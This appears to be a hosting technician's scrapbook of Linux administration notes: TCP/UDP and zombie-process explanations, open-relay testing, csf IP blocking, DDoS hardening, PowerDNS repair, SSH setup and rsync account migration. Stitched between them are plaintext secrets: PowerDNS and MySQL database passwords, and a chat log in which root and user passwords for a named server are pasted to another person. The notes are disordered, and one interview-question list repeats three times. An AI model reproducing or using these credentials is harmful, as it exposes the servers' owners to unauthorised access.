TCP internet protocols? Difference between TCP and UDP TCP UDP Reliability: TCP is connection-oriented protocol. When a file or message send it will get delivered unless connections fails. If connection lost, the server will request the lost part. There is no corruption while transferring a message. Reliability: UDP is connectionless protocol. When you a send a data or message, you don't know if it'll get there, it could get lost on the way. There may be corruption while transferring a message. Ordered: If you send two messages along a connection, one after the other, you know the first message will get there first. You don't have to worry about data arriving in the wrong order. Ordered: If you send two messages out, you don't know what order they'll arrive in i.e. no ordered Heavyweight: - when the low level parts of the TCP "stream" arrive in the wrong order, resend requests have to be sent, and all the out of sequence parts have to be put back together, so requires a bit of work to piece together. Lightweight: No ordering of messages, no tracking connections, etc. It's just fire and forget! This means it's a lot quicker, and the network card / OS have to do very little work to translate the data back from the packets. Streaming: Data is read as a "stream," with nothing distinguishing where one packet ends and another begins. There may be multiple packets per read call. Datagrams: Packets are sent individually and are guaranteed to be whole if they arrive. One packet per one read call. Examples: World Wide Web (Apache TCP port 80), e-mail (SMTP TCP port 25 Postfix MTA), File Transfer Protocol (FTP port 21) and Secure Shell (OpenSSH port 22) etc. Examples: Domain Name System (DNS UDP port 53), streaming media applications such as IPTV or movies, Voice over IP (VoIP), Trivial File Transfer Protocol (TFTP) and online multiplayer games etc On Unix and Unix-like computer operating systems, a zombie process or defunct process is a process that has completed execution but still has an entry in the process table. This entry is still needed to allow the process that started the (now zombie) process to read its exit status. The term zombie process derives from the common definition of zombie—an undead person. In the term's metaphor, the child process has "died" but has not yet been "reaped". Also, unlike normal processes, the kill command has no effect on a zombie process. When a process ends, all of the memory and resources associated with it are deallocated so they can be used by other processes. However, the process's entry in the process table remains. The parent can read the child's exit status by executing the wait system call, at which stage the zombie is removed. The wait call may be executed in sequential code, but it is commonly executed in a handler for the SIGCHLDsignal, which the parent receives whenever a child has died. After the zombie is removed, its process ID and entry in the process table can then be reused. However, if a parent fails to call wait, the zombie will be left in the process table. In some situations this may be desirable, for example if the parent creates another child process it ensures that it will not be allocated the same process ID. On modern UNIX-like systems (that comply with SUSv3 specification in this respect), the following special case applies: if the parent explicitly ignores SIGCHLD by setting its handler to SIG_IGN (rather than simply ignoring the signal by default) or has the SA_NOCLDWAIT flag set, all child exit status information will be discarded and no zombie processes will be left. A zombie process is not the same as an orphan process. An orphan process is a process that is still executing, but whose parent has died. They do not become zombie processes; instead, they are adopted by init (process ID 1), which waits on its children. Zombies can be identified in the output from the Unix ps command by the presence of a “Z” in the “STAT” column. Zombies that exist for more than a short period of time typically indicate a bug in the parent program, or just an uncommon decision to reap children (see example). If the parent program is no longer running, zombie processes typically indicate a bug in the operating system. As with other leaks, the presence of a few zombies is not worrisome in itself, but may indicate a problem that would grow serious under heavier loads. Since there is no memory allocated to zombie processes except for the process table entry itself, the primary concern with many zombies is not running out of memory, but rather running out of process ID numbers. To remove zombies from a system, the SIGCHLD signal can be sent to the parent manually, using the kill command. If the parent process still refuses to reap the zombie, the next step would be to remove the parent process. When a process loses its parent, init becomes its new parent. Init periodically executes the wait system call to reap any zombies with init as parent. What is the difference between a daemon and a server process? by NIXCRAFT on NOVEMBER 15, 2005 · 2 COMMENTS Asked by Pari Kulkarni Q.What is the difference between a daemon and a server process? A. A 'daemon' is a software process that runs in the background (continuously) and provides the service to client upon request. For example named is a daemon. When requested it will provide DNS service. Other examples are: * xinetd (it is a super-daemon, it is responsible for invoking other Internet servers when they are needed) * inetd (same as xinetd, but with limited configuration options) * sendmail/postfix (to send/route email) * Apache/httpd (web server) Following simple example illustrate relationship between client and daemon. CLIENT -> Daemon Browser Running one daemon for each of the services could significantly increase the load. However if you are running big site (with many user) it is advisable to use dedicated daemon. For example web server or MySQL database server. A 'server process' run runs one time, when called by a daemon. Once done it will stop. For example telnetd (in.telnetd) or ftpd called from xinetd/inetd daemon . By calling server process from daemon you can save the load and memory. Use a server process for small services such as ftpd, telnetd CLIENT -> Daemon -> Calls server process ftp -> xinetd -> Calls ftpd ftp xinetd stops ftpd quit Check if the server ip is open relay http://www.checkor.com/ Also check at http://www.spamhelp.org/shopenrelay/ ============================================================================ What is an open relay? An open relay (sometimes also referred to as a third-party relay) is a mail server that does not verify that it is authorised to send mail from the email address that a user is trying to send from. Therefore, users would be able to send email originating from any third-party email address that they want. ============================================================================ Why is an open relay bad? Spammers are constantly on the lookout for open relay SMTP (Simple Mail Transfer Protocol) servers. They use the open relays to send unsolicited mail to a large number of email addresses, which has an impact on delivery speed, bandwidth, disk storage space, CPU processing and more. A number of organisations are cracking down on spam originating from open relay servers by forming blacklists. Several anti-spam solutions check if the mailserver is in one of these blacklists before allowing incoming mail from it. If your mail server gets listed on one of these blacklists, a lot of the emails that you would be sending would not be reaching their destination. ============================================================================ What software blocks spam from open relays? If your open relay is found by a blacklist organisation (usually if someone reports spam coming from your mail server), it would be blacklisted. There are loads of solutions (services, software and appliances/hardware) that block mail from mailservers listed in these blacklists. Many of these are implemented at a server level (eg by ISPs, company mail servers etc) even though not all client-based solutions have this feature. If you are interested in finding software to block spam, you can browse our software section or alternatively take a look at our customizable server-based anti-spam software feature comparison; you can check out the ones listed which have public blacklist support here or else tweak the settings yourself here. Also, you might be interested in taking a look at our services section (eg managed anti-spam solutions) or our appliances section (machines built specifically to stop spam). ============================================================================ How do I close my open relay? If you are a system administrator interested in closing down your open relay (if you have an open relay, then you should!), you can check out the great list maintained by MAPS at http://www.mail-abuse.com/an_sec3rdparty.html. Where can I get more technical info on the Simple Mail Transfer Protocol (SMTP)? You may read the original Request For Comments (RFC 821) by Jonathan B. Postel, August 1982 and the improved version (RFC 2821) by The Internet Society, April 2001. The latter also makes RFC 974 and RFC 1869 obsolete. ============================================================================ To close the open relay run the follwing script from the server : /scripts/fixrelayd /etc/rc.d/init.d/antirelayd restart service exim restart ============================================================================ The old way (open relay server test) Telnet to mail.myserver.com at port 25 and issue all the following commands: helo client.server.com mail from: rockyjr@vsnl.com rcpt to: vivek@nixcraft.in telnet mail.myserver.com 25 Output: Trying 202.51.x.xxx... Connected to mail.myserver.com. Escape character is '^]'. 220 mail.myserver.com ESMTP Postfix helo client.server.com 250 mail.myserver.com mail from: rockyjr@vsnl.com 250 Ok rcpt to: vivek@nixcraft.in 554 : Relay access deniedsetting up default ownership for the folders mkdir foldername chgrp admin folder ls -ld folder name chmod 2070 folder namecsf -a 75.127.97.47 csf -a 208.82.98.73 csf -a 72.9.150.176 csf -a 63.247.193.26 csf -a 66.220.1.132 csf -a 38.106.100.202 csf -a 208.89.214.175 csf -a 67.220.203.15 csf -a 204.74.219.115 csf -a 68.234.15.44 csf -a 207.192.69.191 csf -a 206.251.36.33 csf -a 65.23.158.149 csf -a 209.40.199.237 csf -a 63.223.106.171 csf -a 75.127.97.47 csf -a 208.82.98.73 csf -a 72.9.150.176 csf -a 63.247.193.26 csf -a 66.220.1.132 csf -a 38.106.100.202 csf -a 208.89.214.175 csf -a 67.220.203.15 csf -a 204.74.219.115 csf -a 208.82.98.73 csf -a 66.220.1.132 csf -a 207.192.69.191 csf -a 79.170.90.177 csf -a 212.91.242.137 csf -a 85.234.142.27 csf -a 213.92.118.220 csf -a 95.129.50.5 csf -a 92.243.0.140 csf -a 83.233.30.207 csf -a 59.188.9.237 csf -a 203.211.132.49 csf -a 202.130.33.202 PRATITION SECURITY * nosuid - Do not set SUID/SGID access on this partition * nodev - Do not character or special devices on this partition * noexec - Do not set execution of any binaries on this partition * ro - Mount file system as readonly * quota - Enable disk quota Please note that above options can be set only, if you have a separate partition. Make sure you create a partition as above with special option set on each partition: * /home - Set option nosuid, and nodev with diskquota option * /usr - Set option nodev * /tmp - Set option nodev, nosuid, noexec option must be enabled For example entry in /etc/fstabe for /home should read as follows: mount -o remount /tmp mount -a mount pkill -9 perl [5:18:28 AM] techsupportco5: How to REJECT the IP in router # route add -host IP reject To confirm the null routing status, use ip command as follows: # ip route get IP How do I remove null routing? How do I remove blocked IP address? Simple use router delete command, # ip route delete 65.21.34.4 #rount -n [5:18:53 AM] techsupportco5: >>>>>>>>>>>>>>>>>>>>SCREEN COMMAND>>>>>>>>>>>>>>>>>> # Start Screen: screen -S RV # Detatch Screen: Ctrl-a d # Re-attach Screen: screen -x or screen -x PID OR screen -r <session name> #screen -ls There is a screen on: 6329.RV (Detached) 1 Socket in /var/run/screen/S-root. #Remove Screen :- screen -a OR exit ############################################ THE (DOT) FILES >>The good old dot files. Let’s clear up some confusion here by defining each. .bash_login >>>>Treated by bash like .bash_profileif that doesn’t exist. .bash_logout >>>Sourced by bash login shells at exit. .bash_profile >>>Sourced by bash login shells after /etc/profile .bash_history >>>>The list of commands executed previously. .profile >>>>Treated by bash like ~/.bash_profile if that and .bash_login don’t exist. .vimrc >>>>Default “Vim” configuration file. .emacs Read by emacs at startup PDNS installation : http://jamesreubenknowles.com/install-powerdns-266 PDNS faq: http://wiki.powerdns.com/trac/wiki/PowerDNSFaq If pdns is down and showing the following error : Jan 8 21:27:51 second pdns[16879]: Not authoritative for 'qboost.com', sending servfail to 110.248.223.100 (recursion was desired) Jan 8 21:27:51 second pdns[16879]: Not authoritative for 'qboost.com', sending servfail to 110.248.223.100 (recursion was desired) Jan 8 21:28:02 second pdns[16879]: Not authoritative for 'bankaustria.org', sending servfail to 61.220.4.103 Jan 8 21:28:27 second pdns[16879]: Not authoritative for 'fluxy.net', sending servfail to 194.106.174.234 (recursion was desired) Jan 8 21:28:32 second pdns[16879]: Not authoritative for 'mail.bizturn.com', sending servfail to 124.105.63.200 (recursion was desired) Jan 8 21:28:42 second pdns[16879]: Not authoritative for 'clubbinnyc.com', sending servfail to 207.68.176.76 Jan 8 22:00:24 second pdns[18819]: Not authoritative for 'beammarineoptics.com', sending servfail to 123.22.125.21 (recursion was desired) also no responding to dig : dig @67.19.91.74 vicks.com Try the following solution : vi etc/pdns/pdns.conf (Conf file of pdns) (Check for the database password) launch=gmysql gmysql-host=127.0.0.1 gmysql-user=power_admin gmysql-password=WASQYD34 gmysql-dbname=powerdns (Login to mysql ) mysql -u power_admin -p pass : WASQYD34 use powerdns; (Repair the tables) mysql> repair table records; +------------------+--------+----------+----------+ | Table | Op | Msg_type | Msg_text | +------------------+--------+----------+----------+ | powerdns.records | repair | status | OK | +------------------+--------+----------+----------+ 1 row in set (14.73 sec) Restart mysql check the logs now and also the dig ============== one.nseasy.com: launch=gmysql gmysql-host=127.0.0.1 gmysql-user=power_admin gmysql-password=d4fS4563fSJ43cAx44fWsh78 gmysql-dbname=powerdns *********************************************************************** dig result can be as : ; <<>> DiG 9.3.4-P1 <<>> @67.18.248.82 ghostso.com ; (1 server found) ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 33707 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;ghostso.com. IN A ;; ANSWER SECTION: ghostso.com. 14400 IN A 66.7.221.164 ;; Query time: 3 msec ;; SERVER: 67.18.248.82#53(67.18.248.82) ;; WHEN: Sat Mar 6 01:14:57 2010 ;; MSG SIZE rcvd: 44 [9/4/2010 12:53:33 PM] Sanjin: hi [9/4/2010 12:53:49 PM] techsupportco7: Can you please help me with one thing ? [9/4/2010 12:53:56 PM] Sanjin: what's up? [9/4/2010 12:54:34 PM] techsupportco7: On jade.site.com, I am seeing lots of perl proccess are running with nobody [9/4/2010 12:54:54 PM] techsupportco7: I can pass you the top command output here [9/4/2010 12:54:55 PM] Sanjin: what're the login credentials? i'll take a look for you [9/4/2010 12:55:06 PM] techsupportco7: 1 sec [9/4/2010 12:55:26 PM] techsupportco7: root | KC*hc9%9lrbZ [9/4/2010 12:55:34 PM] techsupportco7: port : 1097 [9/4/2010 12:55:45 PM] Sanjin: no 3gteam on this one? [9/4/2010 12:55:54 PM] techsupportco7: yes, its there [9/4/2010 12:55:57 PM] techsupportco7: sorrry [9/4/2010 12:56:07 PM] Sanjin: what's the 3gteam password? [9/4/2010 12:56:16 PM] techsupportco7: 3gteam Password : e%b68.-?rMz# [9/4/2010 12:59:09 PM] Sanjin: fixed [9/4/2010 12:59:14 PM] Sanjin: i secured /tmp for you and killed the processes [9/4/2010 12:59:45 PM] techsupportco7: Thank you , Yes can see now load is deacreasing [9/4/2010 12:59:50 PM] Sanjin: :) [9/4/2010 1:00:00 PM] techsupportco7: may know how you did that ? [9/4/2010 1:00:20 PM] Sanjin: edit /etc/fstab to include defaults,nosuid,noexec,rw for /tmp & /dev/shm rather than just "defaults" [9/4/2010 1:00:31 PM] Sanjin: and then pkill -9 -u nobody to kill all the nobody processesTo check php info fro the shell php -r 'phpinfo();' | less phpBB blank page : Its shows blank page after installation on phpbb just set 777 permissions for config.php, images/avatars/upload , cache , files/ and store/ Aslo edit the config.php file and check mysql type, if its set with mysqli : change it from $dbms = 'mysqli' ; to $dbms = 'mysql' ; Php mail list error : 500 Internel server error : That's not quite right. I fear that free hosts, geocities and such like, do not allow htaccess files, but others do and yet you can still suffer from the dreaded 500 error. This can be traced to the fact that these hosts allow htaccess files, BUT they do not allow php_flag statements within them. To get around this issue, you need to take the php_flag line out, resave the htaccess file, then add to or create a fresh php.ini file with the php_flag statement in it, BUT without the php_flag prefix. Save this php.ini file into the root folder of your phplist installation. Solution 1. go to php list directory and edit the .htaccesss file remove the line : php_flag magic_quotes_gpc on and save the file. 2. copy the php.ini file and put it in the phplist directory and enable php_flag magic_quotes_gpc on and check phplist admin area DDos atack on pluto netstat -an | grep SYN pico /etc/csf/csf.deny service csf restart server httpd startPort open tester http://www.yougetsignal.com/tools/open-ports/How can we prevent or defend ourselves from these attacks? Like said, Prevention is better than cure. Its very much true in the case of DDOS . DDOS happens because of vulnerable softwares/applications running on a machines in a particular network. Attackers use those security holes to compromise the servers in different network and install the DDOS tools (eg trinoo -DDOS tool ) :::::::::: To prevent DDOS in future, follow the below steps which has 12 major steps :::::::::::::::::::::::::::::: Setup machine / network keeping security in mind (Implement Good Security policy) Setup a firewall which does Ingress and Egress Filtering at Gateway Eg: Steps to Install AFP ---- bash# wget http://www.rfxnetworks.com/downloads/apf-current.tar.gz bash# tar -zxf apf-current.tar.gz bash# cd apf-<version number> bash# ./install.sh Notes: Go through the Document in the Apf and configure it for your needs. All configuration is set at conf.apf which is normally located at /etc/apf/conf.apf Enable Anit-DOS mode in Apf (ie in conf.apf) . Also make sure that your root's cron has an entry like the one below */8 * * * * root /etc/apf/ad/antidos -a >> /dev/null 2>&1 ----- Install IDS on your gateway/hosts to alert you when someone tries to sniff In. Eg: AIDE ---------- (a) Wget ftp://ftp.cs.tut.fi/pub/src/gnu/aide-0.7.tar.gz (b) Untar it tar -zxvf aide-0.7.tar.gz (c) cd aide-0.7 (d) Then execute ./configure -with-gnu-regexp (e) Final steps to install make;make install (f) Now the main step..To configure AIDE.AIDE stores all its rule sets in the file called aide.conf. Lets populate it get more details of how to configure and all from man aide.conf (g) Here I am taking an example .See below Here is a sample short aide.conf: Rule = p+i+u+g+n+s+md5 /etc p+i+u+g /sbin Rule /usr/local/apache/conf Rule /var Rule !/var/spool/.* !/var/log/.* In the above configuration listed , a rule called "Rule" is set to check permissions (p), inode (i), user (u), group (g), number of links (n), size (s), and md5 checksum (md5). This rules are applied to all files in /bin, /sbin, /var, and /usr/local/apache/conf because they should rarely if ever change. Files in /etc are checked for changes in only permissions, inode, user, and group because their size may change, but other things shouldn't. Files and directories in /var/spool and /var/log are not checked because those are folders where maximum updation takes place. (h) After configuring AIDE should be initiated with all these rules. For that execute aide -init ---------- Products price showing as 0 go to >> cd osc/includes/languages pico english.php and set define('LANGUAGE_CURRENCY', 'INR'); to the currency whatever you want to set. http://forums.oscommerce.com/topic/352336-products-price-showing-as-0/ ****************************************************************************************** http://www.oscmax.com/forums/oscommerce-2-2-modification-help/6056-product-price-showing-0-a.html This is a discussion on Product price showing as 0 within the osCommerce 2.2 Modification Help forums, part of the osCommerce 2.2 Forums category; Hi, I am getting Product Price as Zero. I have setup the Euro currency. What is the problem could be?... login into admin area : http://site name/osc/admin/login.php In Admin>Configuration>My Store Switch To Default Language Currency = true That will display prices in GBP or whatever... It's easy no?1. what is ddos attack and how to prevent? 2. What is file system? 3. What is IP spoofing? 4. Port Numbers. 5. How to work FTP and what is use of port 20 and 21? 6. What is kernerl? 7. How many tables in iptables? 8. What are shell variables? 9. What is 'inode'? 10. What are the main differences between RHEL4 & RHEL5? 11. What is difference between imap and pop? 12. Describe linux boot sequence: 13. What different between port and protocols? 14. What is the difference between UDP and TCP internet protocols? 15. What is a zombie process? 16. What is difference between daemon and process? 17. Logs location. 18. difference between unix and linux? 19. What are the main differences between RHEL4 & RHEL5? 20. What are seven fields in the /etc/passwd file? 21. What is a filesystem? 22. What command is used to remove the password assigned to a group? 23. Which of the following commands will show a list of the files in your home directory including hidden files and the contents of all subdirectories? 24. Which file defines all users on your system? 25. What is the minimum number of partitions you need to install Linux? 26. What is a PID? 27. Difference between Hard Link and Soft Link in Linux? 28. What is Raid? The different types and Levels of Raid? 29. What is NFS? What is its purpose? 30. What does nslookup do? 31. What is .htaccess? 32. How many field in crontab? 33. Which log contains information on currently logged in users? 34. What is DNS? 35. How do you create a swapfile? 36. How to get the mysqlbackup and restore? 37. Where is located hardware configuration file in linux? 38. Whats the advantage of using ssh over telnet? 39. How to assign temporary IP address to lan-card? 40. How to recover grub on linux server? 41. How to setup log rotation on linux server? 42. How to see only sub-directory in directory? 43. How to see only files in directory? 44. How to replace the word without opening the file?1. what is ddos attack and how to prevent? 2. What is file system? 3. What is IP spoofing? 4. Port Numbers. 5. How to work FTP and what is use of port 20 and 21? 6. What is kernerl? 7. How many tables in iptables? 8. What are shell variables? 9. What is 'inode'? 10. What are the main differences between RHEL4 & RHEL5? 11. What is difference between imap and pop? 12. Describe linux boot sequence: 13. What different between port and protocols? 14. What is the difference between UDP and TCP internet protocols? 15. What is a zombie process? 16. What is difference between daemon and process? 17. Logs location. 18. difference between unix and linux? 19. What are the main differences between RHEL4 & RHEL5? 20. What are seven fields in the /etc/passwd file? 21. What is a filesystem? 22. What command is used to remove the password assigned to a group? 23. Which of the following commands will show a list of the files in your home directory including hidden files and the contents of all subdirectories? 24. Which file defines all users on your system? 25. What is the minimum number of partitions you need to install Linux? 26. What is a PID? 27. Difference between Hard Link and Soft Link in Linux? 28. What is Raid? The different types and Levels of Raid? 29. What is NFS? What is its purpose? 30. What does nslookup do? 31. What is .htaccess? 32. How many field in crontab? 33. Which log contains information on currently logged in users? 34. What is DNS? 35. How do you create a swapfile? 36. How to get the mysqlbackup and restore? 37. Where is located hardware configuration file in linux? 38. Whats the advantage of using ssh over telnet? 39. How to assign temporary IP address to lan-card? 40. How to recover grub on linux server? 41. How to setup log rotation on linux server? 42. How to see only sub-directory in directory? 43. How to see only files in directory? 44. How to replace the word without opening the file?1. what is ddos attack and how to prevent? 2. What is file system? 3. What is IP spoofing? 4. Port Numbers. 5. How to work FTP and what is use of port 20 and 21? 6. What is kernerl? 7. How many tables in iptables? 8. What are shell variables? 9. What is 'inode'? 10. What are the main differences between RHEL4 & RHEL5? 11. What is difference between imap and pop? 12. Describe linux boot sequence: 13. What different between port and protocols? 14. What is the difference between UDP and TCP internet protocols? 15. What is a zombie process? 16. What is difference between daemon and process? 17. Logs location. 18. difference between unix and linux? 19. What are the main differences between RHEL4 & RHEL5? 20. What are seven fields in the /etc/passwd file? 21. What is a filesystem? 22. What command is used to remove the password assigned to a group? 23. Which of the following commands will show a list of the files in your home directory including hidden files and the contents of all subdirectories? 24. Which file defines all users on your system? 25. What is the minimum number of partitions you need to install Linux? 26. What is a PID? 27. Difference between Hard Link and Soft Link in Linux? 28. What is Raid? The different types and Levels of Raid? 29. What is NFS? What is its purpose? 30. What does nslookup do? 31. What is .htaccess? 32. How many field in crontab? 33. Which log contains information on currently logged in users? 34. What is DNS? 35. How do you create a swapfile? 36. How to get the mysqlbackup and restore? 37. Where is located hardware configuration file in linux? 38. Whats the advantage of using ssh over telnet? 39. How to assign temporary IP address to lan-card? 40. How to recover grub on linux server? 41. How to setup log rotation on linux server? 42. How to see only sub-directory in directory? 43. How to see only files in directory? 44. How to replace the word without opening the file?vi /var/named/domain.db /etc/init.d/named restart SCRIPT TO CHECK REMOTE DATABASE CONNECTION : <?php $Host = "localhost"; //you can use IP address instead of localhost $User = "curtisof_outnet"; $Password = "outnethk"; $Database = "curtisof_sites"; $Link_ID=mysql_pconnect($Host, $User, $Password); if(!$Link_ID) { echo"Failed"; return 0; } else { echo "Connection to the database - successful"; } if(!@mysql_select_db($Database,$Link_ID)) { echo "<br>cannot use Database=".$Database; } else { echo "<br>connected to Database=".$Database; } ?><?php # $ip=@$REMOTE_ADDR; $ip=$_SERVER['REMOTE_ADDR']; echo "<b>IP Address= $ip</b>"; ?> to get IP of site visitor. Error : T=remote_smtp defer (-53): retry time not reached for any host open opendns.com 208.67.222.222 208.67.220.220 add these ip's into pico /etc/resolv.conf and restart named and exim **************************************************************************** http://forums.cpanel.net/f43/t-remote_smtp-defer-53-retry-time-not-reached-any-host-72383.html LOG: retry_defer MAIN == test@******.com R=lookuphost T=remote_smtp defer (-53): retry time not reached for any host This can be caused by multiple things, however if it happens for each email, it's likely your exim databases are corrupt; to resolve this you should: /usr/sbin/exim_tidydb -t 1d /var/spool/exim retry > /dev/null /usr/sbin/exim_tidydb -t 1d /var/spool/exim reject > /dev/null /usr/sbin/exim_tidydb -t 1d /var/spool/exim wait-remote_smtp > /dev/null /scripts/courierup -- force /scripts/eximup --force If you did that, yet the problem persists, you can either seek professional help, or contact the cPanel support. *********************************************************************************************** http://linuxhostingtech.wordpress.com/2010/06/05/exim-error-tremote_smtp-defer-53/ How To Test Check If Mod_rewrite Is Enabled We will be creating two files: - rewrite.php - .htaccess IMPORTANT: its important that you do not change the name of the files we are creating on this post. if for example you choose not to call rewrite.php and choose to call this file something else like testing.php for example, it will not work. YOU MUST name the files as specified on this tutorial, otherwise, you will have problems. so follow instructions carefully 1. Open a blank notepad document 2. Copy and paste the following code into the blank notepad <h2 align=center><?php /* mod_rewrite Test Page *//* Copyright 2006 Webune.com */if($_GET['link']==1){echo '<span style="color:red">You are not using mod_rewrite - Try LINK2</span>';} elseif($_GET['link']==2){echo'<span style="color:green">Congratulations!! You are using Apache mod_rewrite</span>';} else{echo '<span style="color:blue">Linux Apache mod_rewrte Test Tutorial</span>';} ?></h2><hr><title>How To Test mod_rewrite in Apache Linux Server</title><p align="center"><a href="http://www.webune.com/forums/how-to-test-check-if-mod-rewrite-is-enabled-t40.html"><p><a href="rewrite.php?link=1" style="color:red"><strong>LINK 1</strong></a> = LINK 1 Does NOT use Mod Rewrite. LINK 1 uses standard URL: <u>rewrite.php?link=1</u></p><p><a href="link2.html" style="color:green"><strong>LINK 2</strong></a> = LINK 2 - Yes, Uses Apache's Mod Rewrite using this URL:: <u>link2.html</u><br><br><br>How this works: both links are for this same page, except they both are different. link one is without the mod_rewrite and link2 is using mod_rewrite. Link1 show the php file, with with mod_rewrite we are mascarading the php file into a html file. you can use whatever type of extension you want, you can change it to .htm or .shtml etc... all you have to do is to make sure you also chang it in the .htaccess file</p><p>NOTE: when you click on LINK2, you should see a message that says: Congratulations!! You are using Apache mod_rewrite</p><p>500 ERROR: If you get a 500 Error, this means you made a typo or mistake creating the files OR you are not allowed to use .htaccess</p><p>404 ERROR: if you get a 404 error, then this means you do not have Mod_Rewrite on this server.</p><p></p><p><< <a href="http://www.webune.com/forums/how-to-test-check-if-mod-rewrite-is-enabled-t40.html"></p> 3. Now Save the file as "rewrite.php" - When you 'Save As..' in notepad, be sure to put quotes when you are saving the file, otherwise, notepad will add a .txt extension to the file, like this: rewrite.php.txt - is should only be rewrite.php, thats why you have to include the quotes 4. Now create a file called .htaccess - to make this type of file, open another blank notepad document 5. Copy and paste the following code into the .htaccess file: # SCRIPT CREATED BY WEBUNE.COM # THIS WORKS WITH rewrite.php FILE # READ MORE AT: http://www.webune.com/forums/how-to-test-check-if-mod-rewrite-is-enabled-t40.html RewriteEngine On RewriteRule ^link([^/]*).html$ rewrite.php?link=$1 [L] 6. Save as ".htaccess" (if you are using notepad as I am, make sure to put quotes in between .htaccess example: ".htaccess" otherwise, notepad will create a file called .htacces.txt and we don't need the .txt at the end only .htaccess) 7. Now upload these two file into a new directory in your site. for example: test/ 8. Open the rewrite.php file with your browser to the location you just uploaded. for example: http://www.your_website.com/test/rewrite.php 9. you should see two links, LINK1 and LINK2 Click on LINK1 and the same page will display. 10. Now click on LINK2 and the same page will display with the a mod_rewrite message. If it doesnt you either did something wrong. Check your steps. If you checked your steps, refresh your browser, and if refreshing doesnt work, then you dont have mod_rewrite enabled or you dont have permission to run .htaccess files on your website. talk to your web hosting company to make sure they allow apache .htaccess - Some hosting companies do not allow .htaccess because some people take advantage of this feature, so many web hosting companies block their users from using. so check with them If you get a 500 Error, then you do not have mod_rewrite enabled in your server. Or if mod_rewrite is not working for you and you are a Webune customer, please contact our support team to assist you. *************************************************** http://www.webune.com/forums/how-to-test-check-if-mod-rewrite-is-enabled-t40.htmlProcedure to change root login to vicksream user First off all keep login via SSH in server with root login and now open new session with root login 1. userdel njsghdow adduser 3gteam -- will add 3gteam user passwd 3gteam -- this will change the password for 3gteam user. Put the password from database for 3gteam 2. Setting root login : root@rhodium [~]# vi /etc/ssh/sshd_config Set the followring values : Port 1097 #Port 22 #PermitRootLogin no from #PermitRootLogin yes Save the changes and exit from this file. 3. Now restart the sshd service. /etc/init.d/sshd restart 4. Now open the file : pico /etc/group put the user 3gteam against the value wheel wheel:x:10:root,3gteam exit from this file and save the changes. 5. Now check the port 1097 is added or not pico /etc/csf/csf.conf add the port 1097 in TCP_IP and TCP_IN and restart csf service csf -r Also restart the sshd service again and try to ssh with the new session with 3gteam and 1097 port. ****************************************************************************** Setting up user login : userdel njsghdow adduser 3gteam passwd 3gteam vi /etc/ssh/sshd_config permit root login no prt no 1097 service sshd restart vi /etc/group add in wheel : for this go to /etc/ , pico group and search the word : wheel and set the new user like wheel:x:10:root,3gteam login as root Email on root login: 1. cd /root 2. pico .bashrc 3. Scroll to the end of the file then add the following: as per server name echo 'ALERT - Root Shell Access on:' `date` `who` | mail -s "Alert: Root Access on saint.site.com from `who | cut -d"(" -f2 | cut -d")" -f1`" rootlogin@minmaxgroup.com 4. exit and su - again* to block the IP in router : route add -host 114.69.241.130 reject * we have tried this cmd to unblock ip from route and it worked: route del 114.69.241.130 * to check whether the IP is blocked in router or not. route -n | grep 114.69.241.130 http://linux-ip.net/html/tools-ip-route.html rsync -vrplogDtH /var/lib/mysql root@IPAddress:/var/lib rsync -vrplogDtH /var/cpanel root@IPAddress:/var rsync -vrplogDtH /usr/local/apache/conf root@IPAddress:/usr/local/apache rsync -vrplogDtH /usr/local/frontpage root@IPAddress:/usr/local rsync -vrplogDtH /var/named root@IPAddress:/var rsync -vrplogDtH /var/ssl root@IPAddress:/var rsync -vrplogDtH /var/spool/cron root@IPAddress:/var/spool rsync -vrplogDtH /usr/share/ssl root@IPAddress:/usr/share rsync -vrplogDtH /etc/vfilters root@IPAddress:/etc rsync -vrplogDtH /etc/proftpd root@IPAddress:/etc rsync -vrplogDtH /etc/vmail root@IPAddress:/etc rsync -vrplogDtH /home/* root@IPAddress:/home rsync -vrplogDtH /usr/local/cpanel root@IPAddress:/usr/local rsync -vrplogDtH /usr/local/cpanel/3rdparty/mailman root@IPAddress:/usr/local/cpanel/3rdparty rsync -vrplogDtH /var/log/bandwidth root@IPAddress:/var/log rsync -vrplogDtH /root/.my.cnf root@IPAddress:/root rsync -vrplogDtH /etc/httpd/conf/httpd.conf root@IPAddress:/etc/httpd/conf/ rsync -vrplogDtH /etc/sysconfig/network root@IPAddress:/etc/sysconfig ================================================= rsync -vrplogDtH /home/gius/ root@67.23.226.107:/home Use following command rsync -avHP /home/username/public_html root@server_ip:/home/usernamersync -av --progress --rsh="ssh -l 3gteam" saurabhj/ 66.7.193.3:/usr/local/apache/htdocs/saurabhj/ ================================================================================ scp -rp cpmove-saurabhj.tar.gz 3gteam@66.7.193.3:~ scp -rp comove-filename.tar.gz serverusername@serverIP:~ where the server ip is the ip on which server you have to move the accunt and run the command on the server from which you have to move the account scp -rp cpmove-saurabhj.tar.gz /home/ scp -rp filename destination rsync -avHP /home/ukotvcom/public_html/ root@oyster.site.com:/home/ukotvcom/public_html/ rsync -avHP cpmove-abdturkc.tar.gz root@oyster.site.com:/home/ rsync -acHP /var/cpanel/userdata/ukotvcom root@oyster.site.com:/var/cpanel/userdata/ rsync -acHP /var/cpanel/users/ukotvcom root@oyster.site.com:/var/cpanel/users/ rsync -acHP /etc/valiases/ukotv.com root@oyster.site.com:/etc/valiases/ [root@formula ~]# tty /dev/pts/4 [root@formula ~]# ps -a PID TTY TIME CMD 13723 pts/0 00:00:00 vim 18306 pts/4 00:00:00 su 18738 pts/4 00:00:00 bash 18795 pts/5 00:00:00 su 18796 pts/5 00:00:00 bash 18871 pts/0 00:00:00 su 18874 pts/0 00:00:00 bash 19144 pts/3 00:00:00 su 19150 pts/3 00:00:00 bash 21333 pts/4 00:00:00 ps 26617 pts/1 00:00:00 su 26630 pts/1 00:00:00 bash 27184 pts/2 00:00:00 su 27187 pts/2 00:00:00 bash [root@formula ~]# kill -9 26630 26617 27184 27187 [root@formula ~]# ps -a PID TTY TIME CMD 13723 pts/0 00:00:00 vim 18306 pts/4 00:00:00 su 18738 pts/4 00:00:00 bash 18795 pts/5 00:00:00 su 18796 pts/5 00:00:00 bash 18871 pts/0 00:00:00 su 18874 pts/0 00:00:00 bash 19144 pts/3 00:00:00 su 19150 pts/3 00:00:00 bash 21750 pts/4 00:00:00 ps [root@formula ~]# kill -9 13723 18871 18874 [root@formula ~]# ps -a PID TTY TIME CMD 18306 